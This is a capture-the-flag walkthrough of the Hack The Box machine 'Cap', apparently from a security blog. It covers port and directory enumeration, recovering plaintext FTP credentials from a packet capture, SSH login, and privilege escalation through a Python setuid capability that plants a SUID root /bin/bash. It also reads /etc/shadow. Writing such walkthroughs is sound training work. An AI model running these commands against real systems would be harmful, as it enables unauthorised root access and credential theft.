Hack-The-Box-walkthrough[Cap]

Posted on Edited on In Views: Word count in article: 1.4k Reading time ≈ 5 mins.

introduce

OS: Linux
Difficulty: Easy
Points: 20
Release: 05 Jun 2021
IP: 10.10.10.245

  • my htb rank

information gathering

first use nmap as usaul

1
2
3
4
5
6
┌──(root💀kali)-[~/hackthebox/machine/cap]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.245
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    gunicorn

There are three ports open 21:ftp 22:ssh 80:http

Let’s start with ftp let’s check anonymous login is allowed or not.

1
2
3
4
5
6
7
8
9
┌──(root💀kali)-[~/hackthebox/machine/cap]
└─# ftp 10.10.10.245
Connected to 10.10.10.245.
220 (vsFTPd 3.0.3)
Name (10.10.10.245:root): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.

Login failed! now let’s go on with port-80

Port-80

It’s a simple admin-panel.

After some manual enumeration i find nothing. let’s find some directories with help of gobuster.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(root💀kali)-[~/hackthebox/machine/cap]
└─# gobuster dir -u http://10.10.10.245/ -w /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt -t 50
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.245/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/SecLists/Discovery/Web-Content/raft-small-words-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/06/05 21:28:05 Starting gobuster in directory enumeration mode
===============================================================
/data                 (Status: 302) [Size: 208] [--> http://10.10.10.245/]
/ip                   (Status: 200) [Size: 17464]                         
/capture              (Status: 302) [Size: 220] [--> http://10.10.10.245/data/7]
                                                                                
===============================================================
2021/06/05 21:29:08 Finished
===============================================================

/data directory look interesting let’s go and check that.

It’s said not found it’s mean that the directory is exist but we need to find the file.

Let’s enumerate further inside /data directory with wfuzz.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
┌──(root💀kali)-[~/hackthebox/machine/cap]
└─# wfuzz -u http://10.10.10.245/data/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 --hc 302,404
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.245/data/FUZZ
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                           
=====================================================================

000000051:   200        370 L    993 W      17149 Ch    "2"                                                               
000000048:   200        370 L    993 W      17152 Ch    "01"                                                              
000000060:   200        370 L    993 W      17143 Ch    "03"                                                              
000000045:   200        370 L    993 W      17152 Ch    "1"                                                               
000000070:   200        370 L    993 W      17143 Ch    "3"                                                               
000000064:   200        370 L    993 W      17149 Ch    "02"                                                              
000000124:   200        370 L    993 W      17146 Ch    "0"                                                               
000000713:   200        370 L    993 W      17146 Ch    "00"                                                              
000001803:   200        370 L    993 W      17152 Ch    "001"                                                             
000002265:   200        370 L    993 W      17149 Ch    "002"                                                             
000002586:   200        370 L    993 W      17146 Ch    "000"                                                             
000003042:   200        370 L    993 W      17143 Ch    "003"                                                             
000004236:   200        370 L    993 W      17152 Ch    "0001"                                                            
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

Total time: 62.40377
Processed Requests: 5127
Filtered Requests: 5114
Requests/sec.: 82.15849

There are so many files found inside /data directory. after hit and try every file inside directory i found a interesting file called 00.

So let’s go to this url -> 10.10.10.245/data/00

And in there we found a download button let’s download that file.

After downloading the file we found that it’s a .pcap file let’s open this file in wireshark.

And inside wireshark we see there is good amount of ftp request going.

I apply a filter to see only ftp req and we found a username and password that’s try to login in ftp and they got successful login.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
220 (vsFTPd 3.0.3)
USER nathan
331 Please specify the password.
PASS Buck3tH4TF0RM3!
230 Login successful.
SYST
215 UNIX Type: L8
PORT 192,168,196,1,212,140
200 PORT command successful. Consider using PASV.
LIST
150 Here comes the directory listing.
226 Directory send OK.
PORT 192,168,196,1,212,141
200 PORT command successful. Consider using PASV.
LIST -al
150 Here comes the directory listing.
226 Directory send OK.
TYPE I
200 Switching to Binary mode.
PORT 192,168,196,1,212,143
200 PORT command successful. Consider using PASV.
RETR notes.txt
550 Failed to open file.
QUIT
221 Goodbye.

Now let’s try to login with these creads inside ftp.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root💀kali)-[~/hackthebox/machine/cap]
└─# ftp 10.10.10.245
Connected to 10.10.10.245.
220 (vsFTPd 3.0.3)
Name (10.10.10.245:root): nathan
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-r--------    1 1001     1001           33 Jun 02 13:50 user.txt
226 Directory send OK.

We see that we can view inside nathan home directory it’s mean we can login inside ssh also.

Let’s try that.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
┌──(root💀kali)-[~/hackthebox/machine/cap]
└─# ssh nathan@10.10.10.245
The authenticity of host '10.10.10.245 (10.10.10.245)' can't be established.
ECDSA key fingerprint is SHA256:8TaASv/TRhdOSeq3woLxOcKrIOtDhrZJVrrE0WbzjSc.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.245' (ECDSA) to the list of known hosts.
nathan@10.10.10.245's password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-73-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Jun  6 09:55:09 UTC 2021

  System load:           0.0
  Usage of /:            35.2% of 8.73GB
  Memory usage:          37%
  Swap usage:            0%
  Processes:             234
  Users logged in:       1
  IPv4 address for eth0: 10.10.10.245
  IPv6 address for eth0: dead:beef::250:56ff:feb9:26d2

  => There is 1 zombie process.




Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun Jun  6 04:45:03 2021 from 10.10.16.132
nathan@cap:~$ id
uid=1001(nathan) gid=1001(nathan) groups=1001(nathan)
nathan@cap:~$ whoami
nathan
nathan@cap:~$ cat user.txt
654905b014e892c542fb818e05e34a79

And we got login let’s get the user.txt file.

Privilege escalation

let’s run linPEAS.

After analyzing the linPEAS output i found a capabilities tab that has python3.8.

Let’s check that binary if they have root privilege or not.

1
2
3
4
5
6
7
8
9
nathan@cap:~$ ls -la /usr/bin/ | grep -i python3
lrwxrwxrwx  1 root   root          23 Jan 27 15:41 pdb3.8 -> ../lib/python3.8/pdb.py
lrwxrwxrwx  1 root   root          31 Mar 13  2020 py3versions -> ../share/python3/py3versions.py
lrwxrwxrwx  1 root   root           9 Mar 13  2020 python3 -> python3.8
lrwxrwxrwx  1 root   root          16 Mar 13  2020 python3-config -> python3.8-config
-rwxr-xr-x  1 root   root     5486384 Jan 27 15:41 python3.8
lrwxrwxrwx  1 root   root          33 Jan 27 15:41 python3.8-config -> x86_64-linux-gnu-python3.8-config
lrwxrwxrwx  1 root   root          33 Mar 13  2020 x86_64-linux-gnu-python3-config -> x86_64-linux-gnu-python3.8-config
-rwxr-xr-x  1 root   root        3240 Jan 27 15:41 x86_64-linux-gnu-python3.8-config

The binary has own by root let’s run the python3 binary which has symlink to python3.8.

And we also change the suid to 0 becuase 0 is always root.

Let’s check first with whoami command.

1
2
nathan@cap:~$ python3 -c 'import os; os.setuid(0); os.system("whoami")'
root

And we got the output root now with root privilege let’s change the permission to suid bit set of /bin/bash binary so any user can execute that and get root privilege.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
nathan@cap:~$ python3 -c 'import os; os.setuid(0); os.system("chmod +s /bin/bash")'
nathan@cap:~$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1183448 Jun 18  2020 /bin/bash
nathan@cap:~$ /bin/bash -p
bash-5.0# id
uid=1001(nathan) gid=1001(nathan) euid=0(root) egid=0(root) groups=0(root),1001(nathan)
bash-5.0# whoami
root
bash-5.0# cd
bash-5.0# ls
user.txt
bash-5.0# cd /root
bash-5.0# cat root.txt
3d1f4a130d6acf43f869c2c96cf065fa
1
2
bash-5.0# cat /etc/shadow | grep root
root:$6$8vQCitG5q4/cAsI0$Ey/2luHcqUjzLfwBWtArUls9.IlVMjqudyWNOUFUGDgbs9T0RqxH6PYGu/ya6yG0MNfeklSnBLlOskd98Mqdm0:18762:0:99999:7:::

Summary of knowledge

  • use wfuzz fuzz directory
  • use wireshark get ftp username and password from a .pcap file
  • python3 -c ‘import os; os.setuid(0); os.system(“chmod +s /bin/bash”)’ to privesc

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…